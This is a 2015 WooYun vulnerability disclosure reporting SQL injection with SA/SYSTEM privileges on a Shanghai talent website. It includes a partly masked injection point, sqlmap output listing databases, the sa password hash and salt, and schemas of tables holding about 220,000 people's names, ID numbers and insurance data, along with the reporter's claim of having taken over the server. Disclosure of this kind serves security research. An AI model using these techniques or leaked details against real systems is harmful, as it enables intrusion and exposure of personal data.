当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140594

漏洞标题:上海某人才网注入漏洞,泄露大量重要信息(SA权限)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-09-14 23:09

修复时间:2015-10-31 16:30

公开时间:2015-10-31 16:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-14: 细节已通知厂商并且等待厂商处理中
2015-09-16: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-26: 细节向核心白帽子及相关领域专家公开
2015-10-06: 细节向普通白帽子公开
2015-10-16: 细节向实习白帽子公开
2015-10-31: 细节向公众公开

简要描述:

上海某人才网注入漏洞,泄露大量重要信息,包括姓名和证件号码。。。。。。

详细说明:

检测发现是 SA权限,直接是system权限
执行命令: whoami
nt authority\system

另外是可以跨库的。。
BackupPersonInfo | 229941 | 22W 的用户信息。。
服务器已拿下了。。。。
注入点:http://**.**.**.**/DQ/Publicity/ExmYdGvDetail.asp?dGovernID=A01

web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[20:11:28] [INFO] fetching database names
[20:11:28] [INFO] the SQL query used returns 34 entries
available databases [34]:
[*] BH
[*] BOH
[*] Doctor
[*] Doctor1st
[*] Doctor[MinKe]
[*] Dqgz
[*] GyHES
[*] GyTD
[*] GyWeb
[*] HAUP
[*] HAUU
[*] master
[*] model
[*] msdb
[*] Northwind
[*] OaServices
[*] pubs
[*] Qgks_Data
[*] Qgks_MZ
[*] Qgks_XC
[*] ShwshrBBS
[*] ShwshrBE
[*] ShwshrDB
[*] ShwshrTP
[*] SiAfCount
[*] SiAfHS
[*] SJTU
[*] Survey
[*] tempdb
[*] TESTWJ
[*] wshr
[*] wshr_cp
[*] xqdc2012
[*] ZCYY
[20:13:42] [INFO] the SQL query used returns 2 entries
[20:13:42] [INFO] resumed: BUILTIN\\\\Administrators
[20:13:42] [INFO] resumed: sa
database management system users [2]:
[*] BUILTIN\\Administrators
[*] sa
[20:14:35] [WARNING] no clear password(s) found
database management system users password hashes:
[*] BUILTIN\\Administrators [1]:
    password hash: NULL
[*] sa [1]:
    password hash: 
0x0100285ea84052a99be3c533af42329c2b61e39b61836699783730b50a6
5797f8419856dc60f8ef307a21d9e5c03
        header: 0x0100
        salt: 285ea840
        mixedcase: 52a99be3c533af42329c2b61e39b618366997837
        uppercase: 30b50a65797f8419856dc60f8ef307a21d9e5c03
current database:    'Dqgz'
current user:    'SA'
Database: Dqgz
[11 tables]
+----------------+
| D99_Tmp        |
| DatePeriod     |
| Demand         |
| Specialty      |
| Supply         |
| aUserInfo      |
| dUnitInfo      |
| dtproperties   |
| sUnitInfo      |
| sysconstraints |
| syssegments    |
+----------------+
[7 columns]
+--------------+---------+
| Column       | Type    |
+--------------+---------+
| aAttrib      | int     |
| aAttribNote  | varchar |
| aStatus      | varchar |
| aUID         | int     |
| aUserID      | varchar |
| aUserNameChs | varchar |
| aUserPwd     | varchar |
+------------

2.png


3.png


4.png


5.png


6.png


8.jpg


7.png


漏洞证明:

SQLMAP 跑数据。。
直接跨库:
Database: SiAfHS

Database: SiAfHS
[19 tables]
+--------------------+
| BackupPAfVDetail   |
| BackupPAfVDetailC  |
| BackupPSiVDetail   |
| BackupPSiVDetailC  |
| BackupPersonInfo   |
| CurrentPAfVDetail  |
| CurrentPAfVDetailC |
| CurrentPSiVDetail  |
| CurrentPSiVDetailC |
| CurrentUOtherPay   |
| DatePeriod         |
| PersonInfo         |
| Quotiety           |
| UnitAccount        |
| UnitInfo           |
| UserAdmin          |
| dtproperties       |
| sysconstraints     |
| syssegments        |
+--------------------+
Database: SiAfHS
Table: PersonInfo
[70 columns]
+------------------+----------+
| Column           | Type     |
+------------------+----------+
| AfBv             | float    |
| AfBv2010         | float    |
| AfBv2011         | float    |
| AfBv2012         | float    |
| AfBv2013         | float    |
| AfBv2014         | float    |
| AfBvBonus        | float    |
| AfBvBonus2010    | float    |
| AfBvBonus2011    | float    |
| AfBvBonus2012    | float    |
| AfBvBonus2013    | float    |
| AfBvBonus2014    | float    |
| AfBvWage         | float    |
| AfBvWage2010     | float    |
| AfBvWage2011     | float    |
| AfBvWage2012     | float    |
| AfBvWage2013     | float    |
| AfBvWage2014     | float    |
| AfNumber         | varchar  |
| AfStatus         | char     |
| AfStatusMemo     | varchar  |
| BgAfTime         | varchar  |
| BgSiTime         | varchar  |
| Domicile         | char     |
| EdAfTime         | varchar  |
| EdSiTime         | varchar  |
| Education        | varchar  |
| EmployBgTime     | varchar  |
| EmployEdTime     | varchar  |
| EtAfStatus       | char     |
| EtAfTime         | varchar  |
| EtSiStatus       | char     |
| EtSiTime         | varchar  |
| Grade            | varchar  |
| IdCard           | varchar  |
| InitDate         | datetime |
| InitUser         | varchar  |
| Memo             | varchar  |
| ModiDate         | datetime |
| ModiUser         | varchar  |
| PayClass         | char     |
| Phone            | varchar  |
| PID              | bigint   |
| PName            | varchar  |
| ResideBgTime     | varchar  |
| ResideEdTime     | varchar  |
| SiBv             | float    |
| SiBv2010         | float    |
| SiBv2011         | float    |
| SiBv2012         | float    |
| SiBv2013         | float    |
| SiBv2014         | float    |
| SiBvBonus        | float    |
| SiBvBonus2010    | float    |
| SiBvBonus2011    | float    |
| SiBvBonus2012    | float    |
| SiBvBonus2013    | float    |
| SiBvBonus2014    | float    |
| SiBvWage         | float    |
| SiBvWage2010     | float    |
| SiBvWage2011     | float    |
| SiBvWage2012     | float    |
| SiBvWage2013     | float    |
| SiBvWage2014     | float    |
| SiBvWageOriginal | float    |
| SiNumber         | bigint   |
| SiStatus         | char     |
| SpecialStatus    | varchar  |
| Status           | char     |
| UnitID           | int      |
+------------------+----------+


08.png


7.png


8.jpg


9.png


44.png


66.png

修复方案:

你懂的

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-09-16 16:28

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给上海分中心,由其后续协调网站管理单位处置。

最新状态:

暂无